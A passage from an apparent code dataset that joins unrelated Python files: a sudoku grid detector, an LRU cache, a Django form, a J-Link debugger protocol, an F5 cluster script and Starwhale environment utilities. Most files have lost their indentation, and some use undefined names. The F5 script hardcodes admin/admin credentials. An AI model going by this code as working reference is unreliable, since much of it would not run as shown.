transfo_mat = cv2.getPerspectiveTransform(points_grid, final_pts)
undistorted_grids.append(cv2.warpPerspective(frame, transfo_mat, (target_w_grid, target_h_grid)))
transfo_matrix_list.append(np.linalg.inv(transfo_mat))
return undistorted_grids, transfo_matrix_list
@staticmethod
def look_for_grids_corners(img_lines):
contours, _ = cv2.findContours(img_lines, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
best_contours = []
contours = sorted(contours, key=cv2.contourArea, reverse=True)
biggest_area = cv2.contourArea(contours[0])
for cnt in contours:
area = cv2.contourArea(cnt)
if area < smallest_area_allow:
break
if area > biggest_area / ratio_lim:
peri = cv2.arcLength(cnt, True)
approx = cv2.approxPolyDP(cnt, approx_poly_coef * peri, True)
if len(approx) == 4:
best_contours.append(approx)
corners = []
for best_contour in best_contours:
corners.append(find_corners(best_contour))
return np.array(corners, dtype=np.float32)
if __name__ == '__main__':
# im_path = "dataset_test/021.jpg"
im_path = "images_test/sudoku.jpg"
# im_path = "tmp/030.jpg"
# im_path = "images_test/imagedouble.jpg"
# im_path = "images_test/izi_distord.jpg"
im = cv2.imread(im_path)
cv2.imshow("im", im)
detector = GridDetector()
res_grids_final, _, _ = detector.extract_grids(im)
if res_grids_final is not None:
for (i, im_grid) in enumerate(res_grids_final):
cv2.imshow('grid_final_{}'.format(i), im_grid)
cv2.imwrite('images_test/grid_cut_{}.jpg'.format(i), im_grid)
cv2.waitKey()
|
115840
|
import threading
from collections.abc import MutableMapping
from time import time
from .utils.cache_doublylinkedlist import DoublylinkedList
from .utils.cache_node import DoublylinkedListNode
from .utils.cache_thread import RLock
class LRUCache(MutableMapping):
"""Timed Least Recently Used (LRU) cache implementation.
TL;DR:
The timed LRUCache is a dict-like container that is also size limited.
It uses the prune method when instantiated with time to remove
time expired objects.
Timed LRUCache:
All objects on creation have a timestamp on it, this timestamp is used
to check for expired objects when a timeout is given,
the prune method is called and runs periodically in a thread
to do cleanups.
Items are kept in a dict but are also mutually linked to
each other in sequence of their last access time.
Access to single items, deletion, and update is done in constant time O(1)
The size limit, when exceeded will cause the oldest among the
not yet expired items to be kicked out of the cache.
Attributes:
cache: A python dict used to store key value pair.
lock: Thread safe RLock to access class methods.
timeout: Optional (Set time constraint).
maxSize: Set size of lrucache (Defaults to 1).
currentSize: Integer counter (Keeps track of lrucache size).
list_of_most_recent: Doublylinkedlist class instance.
timer: Used to periodically clear the cache when timeout is set.
"""
def __init__(self, maxSize, timeout=None):
self.cache = {}
self.lock = RLock()
self.timeout = timeout
self.maxSize = maxSize or 1
self.currentSize = 0
self.list_of_most_recent = DoublylinkedList()
self.timer = None
if self.timeout:
self._cleanup()
def __getitem__(self, key):
return self.get_value(key)
def __setitem__(self, key, value):
self.insert_key_value(key, value)
def __delitem__(self, key):
return self.delete_key(key)
# O(1) time | 0(1) space
def insert_key_value(self, key, value):
try:
self.lock.acquire()
if key not in self.cache:
if self.currentSize == self.maxSize:
self._evict_least_recent()
else:
self.currentSize += 1
self.cache[key] = DoublylinkedListNode(key, value)
else:
self._update_key(key, value)
self._update_most_recent(self.cache[key])
finally:
self.lock.release()
# O(1) time | 0(1) space
def get_value(self, key):
try:
self.lock.acquire()
if key not in self.cache:
return None
self._update_most_recent(self.cache[key])
return self.cache[key].value
finally:
self.lock.release()
# O(1) time | 0(1) space
def get_most_recent_key(self):
return self.list_of_most_recent.head.key
# O(1) time | 0(1) space
def delete_key(self, key):
try:
self.lock.acquire()
if key not in self.cache:
return None
else:
node = self.cache[key]
node.remove_bindings()
del self.cache[key]
self.currentSize -= 1
head = self.list_of_most_recent.head
tail = self.list_of_most_recent.tail
if head == tail:
self.list_of_most_recent.remove_tail()
finally:
self.lock.release()
# O(n) time | O(1) space
def _prune(self):
if not len(self.cache):
return
try:
self.lock.acquire()
outtime = time() - self.timeout
tail = self.list_of_most_recent.tail
while tail and tail.time_created < outtime:
self._evict_least_recent()
self.currentSize -= 1
tail = self.list_of_most_recent.tail
finally:
self.lock.release()
def _evict_least_recent(self):
key_to_remove = self.list_of_most_recent.tail.key
self.list_of_most_recent.remove_tail()
del self.cache[key_to_remove]
def _update_most_recent(self, node):
self.list_of_most_recent.set_head_to(node)
def _update_key(self, key, value):
if key not in self.cache:
raise Exception("The provided key is not in cache")
self.cache[key].value = value
def _cleanup(self):
self._prune()
timer = threading.Timer(self.timeout, self._cleanup)
timer.start()
self.timer = timer
def stop_timer(self):
self.timer.cancel()
def _contents(self, method, *args):
'''
common backend for methods:
keys, values, items, __len__, __contains__, __iter__
'''
try:
self.lock.acquire()
data = getattr(self.cache, method)(*args)
return data
finally:
self.lock.release()
def __contains__(self, key):
return self._contents('__contains__', key)
has_key = __contains__
def __len__(self):
return self._contents('__len__')
def __iter__(self):
return self._contents('__iter__')
def keys(self):
return self._contents('keys')
def values(self):
data = self._contents('values')
return [v.value for v in data]
def items(self):
data = self._contents('items')
return [(k, v.value) for k, v in data]
def __repr__(self):
d = dict(self.items())
classname = self.__class__.__name__
timeout = f'timeout={self.timeout}'
size = f'size={self.maxSize}'
data = f'data={repr(d)}'
return f'{classname}({timeout}, {size}, {data})'
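
# --- Illustrative usage sketch (assumes the .utils modules are importable;
# timeout is left unset so no cleanup timer thread is started):
if __name__ == '__main__':
    cache = LRUCache(maxSize=2)
    cache['a'] = 1
    cache['b'] = 2
    cache['c'] = 3            # evicts 'a', the least recently used key
    assert 'a' not in cache
    assert cache['b'] == 2    # access moves 'b' to the head of the list
    print(cache)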
|
115844
|
from django import forms
from .models import CartItem
class AddToCartForm(forms.ModelForm):
class Meta:
model = CartItem
fields = [
'quantity'
]
widgets = {
'quantity': forms.NumberInput(attrs={'class': 'full-width'})
}
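
# Hypothetical view-side usage (the cart relation name is an assumption;
# other CartItem fields must be set before saving):
# form = AddToCartForm(request.POST)
# if form.is_valid():
#     item = form.save(commit=False)
#     item.cart = request.cart
#     item.save()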
|
115861
|
import sys
import pylink
from time import sleep
from threading import Thread, Event, Condition
import logging
import re
if sys.version_info < (3, 0):
import Queue as queue
# __class__ = instance.__class__
else:
import queue
from avatar2.archs.arm import ARM
from avatar2.targets import TargetStates
from avatar2.message import AvatarMessage, UpdateStateMessage, BreakpointHitMessage
class JLinkProtocol(Thread):
"""Main class for the JLink bprotocol, via pylink-square
:ivar serial: The serial number of the JLink to connect to
:ivar device: The JLink device name for the target
:ivar avatar: the avatar object
:ivar origin: the target utilizing this protocol
"""
def __init__(self, serial="12345678", device="ARM7", avatar=None, origin=None):
self._shutdown = Event()
self.avatar = avatar
self.origin = origin
self.jlink = pylink.JLink()
self.jlink.open(serial)
self.log = logging.getLogger('%s.%s' %
(origin.log.name, self.__class__.__name__)
) if origin else \
logging.getLogger(self.__class__.__name__)
Thread.__init__(self)
self.connect(device=device)
def __del__(self):
self.shutdown()
def connect(self, device="ARM7"):
# Todo add a time out here
while True:
try:
self.jlink.connect(device, verbose=True)
self.jlink.ir_len()
break
except pylink.errors.JLinkException:
self.log.info("Connection failed, trying again...")
sleep(0.25)
self.log.info("Connected to JLink target")
self.start()
return True
def reset(self, halt=True):
self.log.info("Resetting target")
return self.jlink.reset(halt=halt)
def shutdown(self):
self._shutdown.set()
def update_target_regs(self):
"""
This function will try to update the TargetRegs based on the list of
registers known to gdb.
"""
regs = {}
for idx in self.jlink.register_list():
name = self.jlink.register_name(idx)
regs[name] = idx
if hasattr(self.origin, 'regs'):
self.origin.regs._update(regs)
def run(self):
# Target state management thread
# This thread needs to poll for the halted state
# of the target
# JLink is lame and doesn't let you do this asynch
# Also, not all targets produce a "moe" (Mode of Entry)
# so we have to actually do that here.
try:
while not self._shutdown.is_set():
is_halted = self.jlink.halted()
if is_halted and self.origin.state == TargetStates.RUNNING:
# We just halted
# But did we hit a BP?
self.log.debug("JLink Target is halting...")
avatar_msg = UpdateStateMessage(self.origin, TargetStates.STOPPED)
self.avatar.fast_queue.put(avatar_msg)
self.origin.wait()
self.log.debug("JLink target has halted")
pc = self.get_pc()
if self.jlink.breakpoint_find(pc):
self.log.debug("JLink Target hit breakpoint %d" % self.jlink.breakpoint_find(pc))
avatar_msg = BreakpointHitMessage(self.origin, self.jlink.breakpoint_find(pc), pc)
self.avatar.queue.put(avatar_msg)
elif not is_halted and self.origin.state == TargetStates.STOPPED:
self.log.debug("About to resume target.")
avatar_msg = UpdateStateMessage(self.origin, TargetStates.RUNNING)
self.avatar.fast_queue.put(avatar_msg)
while self.origin.state != TargetStates.RUNNING:
pass
self.log.debug("JLink target has resumed")
except:
self.log.exception("JLink target errored")
finally:
self.log.info("JLink target exiting")
self.jlink.close()
def set_breakpoint(self, line,
hardware=False,
temporary=False,
regex=False,
condition=None,
ignore_count=0,
thread=0,
pending=False):
"""Inserts a breakpoint
:param bool hardware: Hardware breakpoint
:param bool temporary: Tempory breakpoint
:param str regex: If set, inserts breakpoints matching the regex
:param str condition: If set, inserts a breakpoint with specified condition
:param int ignore_count: Amount of times the bp should be ignored
:param int thread: Threadno in which this breakpoints should be added
:returns: The number of the breakpoint
"""
# TODO: Hw/Sw breakpoint control
self.log.info("Setting breakpoint at %#08x" % line)
ret = self.jlink.breakpoint_set(line)
self.log.info("Got BP ID %d" % ret)
return ret
def set_watchpoint(self, variable, write=True, read=False):
return self.jlink.watchpoint_set(variable, write=write, read=read)
def remove_breakpoint(self, bkpt):
"""Deletes a breakpoint"""
# TODO: Check this
return self.jlink.breakpoint_clear(bkpt)
def write_memory(self, address, wordsize, val, num_words=1, raw=False):
"""Writes memory
:param address: Address to write to
:param wordsize: the size of the write (1, 2, 4 or 8)
:param val: the written value
:type val: int if num_words == 1 and raw == False
list if num_words > 1 and raw == False
str or byte if raw == True
:param num_words: The amount of words to read
:param raw: Specifies whether to write in raw or word mode
:returns: True on success else False
"""
        if raw:
            if not len(val):
                raise ValueError("val had zero length")
            val = [ord(v) for v in val]
        try:
            self.jlink.memory_write(address, val)
            return True
        except pylink.errors.JLinkException:
            return False
def read_memory(self, address, wordsize=4, num_words=1, raw=False):
"""reads memory
:param address: Address to write to
:param wordsize: the size of a read word (1, 2, 4 or 8)
:param num_words: the amount of read words
:param raw: Whether the read memory should be returned unprocessed
:return: The read memory
"""
ret = self.jlink.memory_read(address, num_units=num_words, nbits=wordsize)
if raw:
raw_mem = "".join([newint.to_bytes(i, length=int(math.ceil(i.bit_length() / 8.0))) for i in ret])
return raw_mem
return ret
def read_register(self, reg):
        the_reg = reg.lower()
the_idx = -1
for idx in self.jlink.register_list():
if the_reg == self.jlink.register_name(idx):
the_idx = idx
break
        return self.jlink.register_read(the_idx)
def get_pc(self):
# Get PC a shitty way
for idx in self.jlink.register_list():
if "PC" in self.jlink.register_name(idx):
return self.jlink.register_read(idx)
def write_register(self, reg, val):
"""Set one register on the target
:returns: True on success"""
        the_reg = reg.lower()
the_idx = -1
for idx in self.jlink.register_list():
if the_reg == self.jlink.register_name(idx):
the_idx = idx
break
return self.jlink.register_write(the_idx, val)
def step(self):
"""Step one instruction on the target
:returns: True on success"""
return self.jlink.step()
def cont(self):
"""Continues the execution of the target
:returns: True on success"""
self.log.info("Resuming target...")
return self.jlink.restart()
def stop(self):
"""Stops execution of the target
:returns: True on success"""
self.log.info("Stopping target...")
return self.jlink.halt()
def set_endianness(self, endianness='little'):
if 'little' in endianness:
self.jlink.set_little_endian()
elif "big" in endianness:
self.jlink.set_big_endian()
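
# --- Hypothetical usage sketch (serial number and device name are examples):
# proto = JLinkProtocol(serial="50123456", device="STM32F407VG")
# proto.set_breakpoint(0x08000000)
# proto.cont()    # resume; the run() thread reports state changes to avatar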
|
115869
|
from f5.bigip import ManagementRoot
from f5.cluster.cluster_manager import ClusterManager
a = ManagementRoot('10.190.20.202', 'admin', 'admin')
b = ManagementRoot('10.190.20.203', 'admin', 'admin')
c = ManagementRoot('10.190.20.204', 'admin', 'admin')
cm = ClusterManager([a, b], 'testing_cluster', 'Common', 'sync-failover')
cm.teardown_cluster()
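# Note: build and teardown are shown back-to-back; ClusterManager([a, b], ...)
# forms the sync-failover device group and teardown_cluster() dissolves it.
# Device `c` is connected above but left out of the cluster.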
|
115887
|
import matplotlib.pyplot as plt
import numpy as np
import torch
weights = torch.load('RN_epoch_350.pth')
W = weights['rl.pool.weight'].cpu()
# filter out virtually-zero weights
# the pooling layer has 20 slots but the set size is only 12; W[:, 1] and
# W[:, -2] stay at approximately 0, so we drop them from the plot
W = W[W.norm(p=1, dim=1) > 1e-12]
x = torch.linspace(0, 1, W.size(1))
idx = list(range(W.size(1)))
idx.remove(1)
idx.remove(W.size(1) - 2)
W = W[:, idx]
x = x[idx]
for i, w in enumerate(W):
plt.subplot(10, 9, i + 1)
plt.axhline(y=0.0, color='k', linestyle='-', alpha=0.2)
plt.plot(x.numpy(), w.numpy())
plt.xticks([])
plt.yticks([])
plt.ylim(-1, 1)
plt.show()
|
115898
|
import os
import sys
import shutil
import typing as t
import tarfile
import platform
import subprocess
from pathlib import Path
import conda_pack
import virtualenv
from loguru import logger
from starwhale.utils import console, is_linux, is_darwin, is_windows
from starwhale.consts import (
ENV_VENV,
ENV_CONDA,
PythonRunEnv,
ENV_CONDA_PREFIX,
SW_PYPI_PKG_NAME,
DEFAULT_PYTHON_VERSION,
)
from starwhale.utils.fs import empty_dir, ensure_dir, ensure_file
from starwhale.utils.error import (
FormatError,
ExistedError,
NotFoundError,
NoSupportError,
PythonEnvironmentError,
)
from starwhale.utils.process import check_call
CONDA_ENV_TAR = "env.tar.gz"
DUMP_CONDA_ENV_FNAME = "env-lock.yaml"
DUMP_PIP_REQ_FNAME = "requirements-lock.txt"
DUMP_USER_PIP_REQ_FNAME = "requirements.txt"
SUPPORTED_PIP_REQ = [DUMP_USER_PIP_REQ_FNAME, "pip-req.txt", "pip3-req.txt"]
_DUMMY_FIELD = -1
class PythonVersionField(t.NamedTuple):
major: int = _DUMMY_FIELD
minor: int = _DUMMY_FIELD
micro: int = _DUMMY_FIELD
def conda_install_req(
req: t.Union[str, Path],
env_name: str = "",
prefix_path: t.Optional[Path] = None,
enable_pre: bool = False,
) -> None:
prefix_cmd = [get_conda_bin(), "run"]
if env_name:
prefix_cmd += ["--name", env_name]
elif prefix_path is not None:
prefix_cmd += ["--prefix", str(prefix_path.absolute())]
prefix_cmd += ["python3", "-m", "pip"]
_do_pip_install_req(prefix_cmd, req, enable_pre)
def _do_pip_install_req(
prefix_cmd: t.List[t.Any], req: t.Union[str, Path], enable_pre: bool = False
) -> None:
cmd = prefix_cmd + [
"install",
"--exists-action",
"w",
]
_env = os.environ
if _env.get("SW_PYPI_INDEX_URL"):
cmd += [
"--index-url",
_env["SW_PYPI_INDEX_URL"],
]
if _env.get("SW_PYPI_EXTRA_INDEX_URL"):
cmd += [
"--extra-index-url",
_env["SW_PYPI_EXTRA_INDEX_URL"],
]
if _env.get("SW_PYPI_TRUSTED_HOST"):
cmd += ["--trusted-host", _env["SW_PYPI_TRUSTED_HOST"]]
if enable_pre:
cmd += ["--pre"]
if isinstance(req, Path):
cmd += ["-r", str(req.absolute())]
elif os.path.isfile(req):
cmd += ["-r", req]
else:
cmd += [req]
check_call(cmd)
def venv_install_req(
venvdir: t.Union[str, Path], req: t.Union[str, Path], enable_pre: bool = False
) -> None:
venvdir = str(venvdir)
req = str(req)
prefix_cmd = [os.path.join(venvdir, "bin", "pip")]
_do_pip_install_req(prefix_cmd, req, enable_pre)
def venv_activate(venvdir: t.Union[str, Path]) -> None:
_fpath = Path(venvdir) / "bin" / "activate"
cmd = f"source {_fpath.absolute()}"
check_call(cmd, shell=True, executable="/bin/bash")
def parse_python_version(s: str) -> PythonVersionField:
s = s.strip().lower()
if not s:
raise FormatError("python version empty")
if s.startswith("python"):
s = s.split("python", 1)[-1]
_vt = s.split(".")
_major, _minor, _micro = int(_vt[0]), _DUMMY_FIELD, _DUMMY_FIELD
if len(_vt) >= 2:
_minor = int(_vt[1])
if len(_vt) >= 3:
_micro = int(_vt[2])
return PythonVersionField(major=_major, minor=_minor, micro=_micro)
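
# Illustrative expectations (derived from the parsing rules above; a missing
# component stays at the _DUMMY_FIELD sentinel, -1):
#   parse_python_version("python3.7.10") -> PythonVersionField(major=3, minor=7, micro=10)
#   parse_python_version("3.8")          -> PythonVersionField(major=3, minor=8, micro=-1)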
def venv_setup(
venvdir: t.Union[str, Path],
python_version: str,
prompt: str = "",
clear: bool = False,
) -> None:
# TODO: define starwhale virtualenv.py
# TODO: use more elegant method to make venv portable
args = [str(venvdir)]
if prompt:
args += ["--prompt", prompt]
if python_version:
_v = parse_python_version(python_version)
args += ["--python", f"{_v.major}.{_v.minor}"]
if clear:
args += ["--clear"]
session = virtualenv.cli_run(args)
console.print(f":clap: create venv@{venvdir}, python:{session.interpreter.version}") # type: ignore
def pip_freeze(
py_env: str, path: t.Union[str, Path], include_editable: bool = False
) -> None:
# TODO: add cmd timeout and error log
_py_bin = get_user_runtime_python_bin(py_env)
logger.info(f"{_py_bin}: pip freeze")
cmd = [_py_bin, "-m", "pip", "freeze", "--require-virtualenv"]
if not include_editable:
cmd += ["--exclude-editable"]
cmd += [">", str(path)]
check_call(" ".join(cmd), shell=True)
def user_pip_install_pkg(py_env: str, pkg_name: str, enable_pre: bool = False) -> None:
_py_bin = get_user_runtime_python_bin(py_env)
cmd = [_py_bin, "-m", "pip", "install"]
if enable_pre:
cmd += ["--pre"]
cmd += [pkg_name]
check_call(cmd)
def check_python_interpreter_consistency(mode: str) -> t.Tuple[bool, str, str]:
if mode == PythonRunEnv.CONDA:
ep_base_prefix = os.environ.get(ENV_CONDA_PREFIX, "")
elif mode == PythonRunEnv.VENV:
ep_base_prefix = os.environ.get(ENV_VENV, "")
else:
ep_base_prefix = (
os.environ.get(ENV_VENV)
or os.environ.get(ENV_CONDA_PREFIX)
or sys.base_prefix
)
logger.debug(
f"current python interpreter base_prefix:{sys.base_prefix}, expected env base_prefix:{ep_base_prefix}"
)
_ok = ep_base_prefix == sys.base_prefix
if not _ok:
cur_version = f"{sys.version_info.major}.{sys.version_info.minor}"
user_version = get_user_python_version(mode)
if not user_version.startswith(cur_version):
logger.error(
f"swcli use python:{cur_version}, but runtime venv/conda python:{user_version}"
)
raise PythonEnvironmentError(
f"swcli({cur_version}), runtime({user_version})"
)
return _ok, sys.base_prefix, ep_base_prefix
def guess_current_py_env() -> str:
if is_venv():
return PythonRunEnv.VENV
elif is_conda():
return PythonRunEnv.CONDA
else:
return PythonRunEnv.SYSTEM
def get_user_python_sys_paths(py_env: str) -> t.List[str]:
logger.debug(f"get env({py_env}) sys path")
_py_bin = get_user_runtime_python_bin(py_env)
logger.info(f"{_py_bin}: sys.path")
output = subprocess.check_output(
[
_py_bin,
"-c",
"import sys; print(','.join(sys.path))",
]
)
return output.decode().strip().split(",")
def conda_create(
env: str,
python_version: str = DEFAULT_PYTHON_VERSION,
quiet: bool = False,
) -> None:
cmd = ["conda", "create", "--name", env, "--yes"]
if quiet:
cmd += ["--quiet"]
cmd += [f"python={python_version}"]
check_call(cmd)
def conda_export(path: t.Union[str, Path], env: str = "") -> None:
# TODO: add cmd timeout
cmd = f"{get_conda_bin()} env export"
env = f"-n {env}" if env else ""
check_call(f"{cmd} {env} > {path}", shell=True)
def conda_restore(
env_fpath: t.Union[str, Path], target_env: t.Union[str, Path]
) -> None:
cmd = f"{get_conda_bin()} env update --file {env_fpath} --prefix {target_env}"
check_call(cmd, shell=True)
def conda_activate(env: t.Union[str, Path]) -> None:
cmd = f"{get_conda_bin()} activate {env}"
check_call(cmd, shell=True)
def conda_activate_render(env_dir: Path, workdir: Path) -> None:
sw_cntr_content = """
_conda_hook="$(/opt/miniconda3/bin/conda shell.bash hook)"
cat >> /dev/stdout << EOF
$_conda_hook
conda activate /opt/starwhale/swmp/dep/conda/env
EOF
"""
host_content = f"""
echo 'conda activate {env_dir.absolute()}'
"""
_render_sw_activate(sw_cntr_content, host_content, workdir)
def venv_activate_render(
venvdir: t.Union[str, Path], workdir: Path, relocate: bool = False
) -> None:
bin = f"{venvdir}/bin"
host_content = f"""
echo 'source {venvdir}/bin/activate'
"""
if relocate:
# TODO: support relocatable editable python package
sw_cntr_content = f"""
sed -i '1d' {bin}/starwhale {bin}/sw {bin}/swcli {bin}/pip* {bin}/virtualenv
sed -i '1i\#!{bin}/python3' {bin}/starwhale {bin}/sw {bin}/swcli {bin}/pip* {bin}/virtualenv
sed -i 's#^VIRTUAL_ENV=.*$#VIRTUAL_ENV={venvdir}#g' {bin}/activate
rm -rf {bin}/python3
ln -s /usr/bin/python3 {bin}/python3
echo 'source {bin}/activate'
"""
else:
sw_cntr_content = host_content
_render_sw_activate(sw_cntr_content, host_content, workdir)
def _render_sw_activate(sw_cntr_content: str, host_content: str, workdir: Path) -> None:
_sw_path = workdir / "activate.sw"
_host_path = workdir / "activate.host"
ensure_file(_sw_path, sw_cntr_content, mode=0o755)
ensure_file(_host_path, host_content, mode=0o755)
console.print(
f" :clap: {_sw_path.name} and {_host_path.name} is generated at {workdir}"
)
console.print(" :compass: run cmd: ")
console.print(f" \t Docker Container: [bold red] $(sh {_sw_path}) [/]")
console.print(f" \t Host: [bold red] $(sh {_host_path}) [/]")
def get_conda_bin() -> str:
# TODO: add process cache
for _p in (
"/opt/miniconda3/bin/conda",
"/opt/anaconda3/bin/conda",
os.path.expanduser("~/miniconda3/bin/conda"),
os.path.expanduser("~/anaconda3/bin/conda"),
):
if os.path.exists(_p):
return _p
else:
return "conda"
def dump_python_dep_env(
dep_dir: t.Union[str, Path],
pip_req_fpath: str,
gen_all_bundles: bool = False,
expected_runtime: str = "",
mode: str = PythonRunEnv.AUTO,
include_editable: bool = False,
identity: str = "",
) -> t.Dict[str, t.Any]:
# TODO: smart dump python dep by starwhale sdk-api, pip ast analysis?
dep_dir = Path(dep_dir)
pr_env = get_python_run_env(mode)
sys_name = platform.system()
py_ver = get_user_python_version(pr_env)
validate_python_environment(mode, expected_runtime, identity)
validate_runtime_package_dep(mode)
_manifest = dict(
expected_mode=mode,
env=pr_env,
system=sys_name,
python=py_ver,
local_gen_env=False,
venv=dict(use=is_venv()),
conda=dict(use=is_conda()),
)
_conda_dir = dep_dir / "conda"
_python_dir = dep_dir / "python"
_venv_dir = _python_dir / "venv"
_pip_lock_req = _python_dir / DUMP_PIP_REQ_FNAME
_conda_lock_env = _conda_dir / DUMP_CONDA_ENV_FNAME
ensure_dir(_venv_dir)
ensure_dir(_conda_dir)
ensure_dir(_python_dir)
console.print(
f":dizzy: python{py_ver}@{pr_env}, os({sys_name}), include-editable({include_editable}), try to export environment..."
)
if os.path.exists(pip_req_fpath):
shutil.copyfile(pip_req_fpath, str(_python_dir / DUMP_USER_PIP_REQ_FNAME))
if pr_env == PythonRunEnv.CONDA:
if include_editable:
raise NoSupportError("conda cannot support export pip editable package")
logger.info(f"[info:dep]dump conda environment yaml: {_conda_lock_env}")
conda_export(_conda_lock_env)
elif pr_env == PythonRunEnv.VENV:
logger.info(f"[info:dep]dump pip-req with freeze: {_pip_lock_req}")
pip_freeze(pr_env, _pip_lock_req, include_editable)
else:
# TODO: add other env tools
logger.warning(
"detect use system python, swcli does not pip freeze, only use custom pip-req"
)
if is_windows() or is_darwin() or not gen_all_bundles:
# TODO: win/osx will produce env in controller agent with task
logger.info(f"[info:dep]{sys_name} will skip conda/venv dump or generate")
elif is_linux():
# TODO: more design local or remote build venv
# TODO: ignore some pkg when dump, like notebook?
_manifest["local_gen_env"] = True # type: ignore
if pr_env == PythonRunEnv.CONDA:
cenv = get_conda_env()
dest = str(_conda_dir / CONDA_ENV_TAR)
if not cenv:
raise Exception("cannot get conda env value")
# TODO: add env/env-name into model.yaml, user can set custom vars.
logger.info("[info:dep]try to pack conda...")
conda_pack.pack(
name=cenv,
force=True,
output=dest,
ignore_editable_packages=not include_editable,
)
logger.info(f"[info:dep]finish conda pack {dest})")
console.print(f":beer_mug: conda pack @ [underline]{dest}[/]")
else:
# TODO: tune venv create performance, use clone?
logger.info(f"[info:dep]build venv dir: {_venv_dir}")
venv_setup(_venv_dir, python_version=expected_runtime)
logger.info(
f"[info:dep]install pip freeze({_pip_lock_req}) to venv: {_venv_dir}"
)
venv_install_req(_venv_dir, _pip_lock_req)
if os.path.exists(pip_req_fpath):
logger.info(
f"[info:dep]install custom pip({pip_req_fpath}) to venv: {_venv_dir}"
)
# TODO: support ignore editable package
venv_install_req(_venv_dir, pip_req_fpath)
console.print(f":beer_mug: venv @ [underline]{_venv_dir}[/]")
else:
raise NoSupportError(f"no support {sys_name} system")
return _manifest
def detect_pip_req(workdir: t.Union[str, Path], fname: str = "") -> str:
workdir = Path(workdir)
if fname and (workdir / fname).exists():
return str(workdir / fname)
    else:
        for p in SUPPORTED_PIP_REQ:
            if (workdir / p).exists():
                return str(workdir / p)
        return ""
def activate_python_env(
mode: str,
identity: str,
) -> None:
# TODO: switch shell python environment directly
console.print(":cake: run command in shell :cake:")
if mode == PythonRunEnv.VENV:
cmd = f"source {identity}/bin/activate"
elif mode == PythonRunEnv.CONDA:
cmd = f"conda activate {identity}"
else:
raise NoSupportError(mode)
console.print(f"\t[red][blod]{cmd}")
def create_python_env(
mode: str,
name: str,
workdir: Path,
python_version: str = DEFAULT_PYTHON_VERSION,
force: bool = False,
) -> str:
if mode == PythonRunEnv.VENV:
venvdir = workdir / "venv"
if venvdir.exists() and not force:
raise ExistedError(str(venvdir))
logger.info(f"create venv @ {venvdir}...")
venv_setup(venvdir, python_version=python_version, prompt=name)
return str(venvdir.absolute())
elif mode == PythonRunEnv.CONDA:
logger.info(f"create conda {name}:{workdir}, use python {python_version}...")
conda_create(name, python_version)
return name
else:
raise NoSupportError(mode)
def get_user_python_version(py_env: str) -> str:
_py_bin = get_user_runtime_python_bin(py_env)
logger.info(f"{_py_bin}: python version")
output = subprocess.check_output(
[
_py_bin,
"-c",
"import sys; _v=sys.version_info;print(f'{_v.major}.{_v.minor}.{_v.micro}')",
]
)
return output.decode().strip()
def get_user_runtime_python_bin(py_env: str) -> str:
_prefix = get_base_prefix(py_env)
_py_bin = os.path.join(_prefix, "bin", "python3")
if not os.path.exists(_py_bin):
raise NotFoundError(_py_bin)
return _py_bin
def get_base_prefix(py_env: str) -> str:
if py_env == PythonRunEnv.VENV:
_path = os.environ.get(ENV_VENV, "")
elif py_env == PythonRunEnv.CONDA:
_path = os.environ.get(ENV_CONDA_PREFIX, "")
else:
_path = sys.prefix
if _path and os.path.exists(_path):
return _path
else:
raise NotFoundError(f"mode:{py_env}, base_prefix:{_path}")
def is_venv() -> bool:
# TODO: refactor for get external venv attr
output = subprocess.check_output(
[
"python3",
"-c",
"import sys; print(sys.prefix != (getattr(sys, 'base_prefix', None) or (getattr(sys, 'real_prefix', None) or sys.prefix)))", # noqa: E501
],
)
return "True" in output.decode() or get_venv_env() != ""
def get_venv_env() -> str:
return os.environ.get(ENV_VENV, "")
def is_conda() -> bool:
return get_conda_env() != "" and get_conda_env_prefix() != ""
def get_python_run_env(mode: str = PythonRunEnv.AUTO) -> str:
if mode == PythonRunEnv.VENV:
if is_venv():
return PythonRunEnv.VENV
else:
raise EnvironmentError(
"expected venv mode, but cannot find venv environment"
)
elif mode == PythonRunEnv.CONDA:
if is_conda():
return PythonRunEnv.CONDA
else:
raise EnvironmentError("expected conda mode, but cannot find conda envs")
elif mode == PythonRunEnv.AUTO:
if is_conda() and is_venv():
raise EnvironmentError("find venv and conda both activate")
if is_conda():
return PythonRunEnv.CONDA
elif is_venv():
return PythonRunEnv.VENV
else:
return PythonRunEnv.SYSTEM
else:
raise NoSupportError(f"python run env: {mode}")
def get_conda_env() -> str:
return os.environ.get(ENV_CONDA, "")
def get_conda_env_prefix() -> str:
return os.environ.get(ENV_CONDA_PREFIX, "")
def restore_python_env(
workdir: Path,
mode: str,
python_version: str,
local_gen_env: bool = False,
pip_req: str = "",
) -> None:
console.print(
f":bread: restore python:{python_version} {mode}@{workdir}, use local env data: {local_gen_env}"
)
_f = _do_restore_conda if mode == PythonRunEnv.CONDA else _do_restore_venv
_f(workdir, local_gen_env, python_version, pip_req)
def _do_restore_conda(
_workdir: Path,
_local_gen_env: bool,
_python_version: str,
_pip_req: str,
) -> None:
_conda_dir = _workdir / "dep" / "conda"
_tar_fpath = _conda_dir / CONDA_ENV_TAR
_env_dir = _conda_dir / "env"
_python_dir = _workdir / "dep" / "python"
if _local_gen_env and _tar_fpath.exists():
empty_dir(_env_dir)
ensure_dir(_env_dir)
logger.info(f"extract {_tar_fpath} ...")
with tarfile.open(str(_tar_fpath)) as f:
f.extractall(str(_env_dir))
venv_activate_render(_env_dir, _workdir)
else:
logger.info("restore conda env ...")
_env_yaml = _conda_dir / DUMP_CONDA_ENV_FNAME
conda_restore(_env_yaml, _env_dir)
_pip_req_path = _python_dir / _pip_req
if _pip_req_path.exists():
conda_install_req(req=_pip_req_path, prefix_path=_env_dir)
conda_activate_render(_env_dir, _workdir)
def _do_restore_venv(
_workdir: Path,
_local_gen_env: bool,
_python_version: str,
pip_req: str,
_rebuild: bool = False,
) -> None:
_python_dir = _workdir / "dep" / "python"
_venv_dir = _python_dir / "venv"
_relocate = True
if _rebuild or not _local_gen_env or not (_venv_dir / "bin" / "activate").exists():
logger.info(f"setup venv and pip install {_venv_dir}")
_relocate = False
venv_setup(_venv_dir, python_version=_python_version)
for _name in (DUMP_PIP_REQ_FNAME, pip_req):
_path = _python_dir / _name
if not _name or not _path.exists():
continue
logger.info(f"pip install {_path} ...")
venv_install_req(_venv_dir, _path)
venv_activate_render(_venv_dir, _workdir, relocate=_relocate)
def validate_runtime_package_dep(py_env: str) -> None:
_py_bin = get_user_runtime_python_bin(py_env)
logger.info(f"{_py_bin}: check {SW_PYPI_PKG_NAME} install")
cmd = [
_py_bin,
"-c",
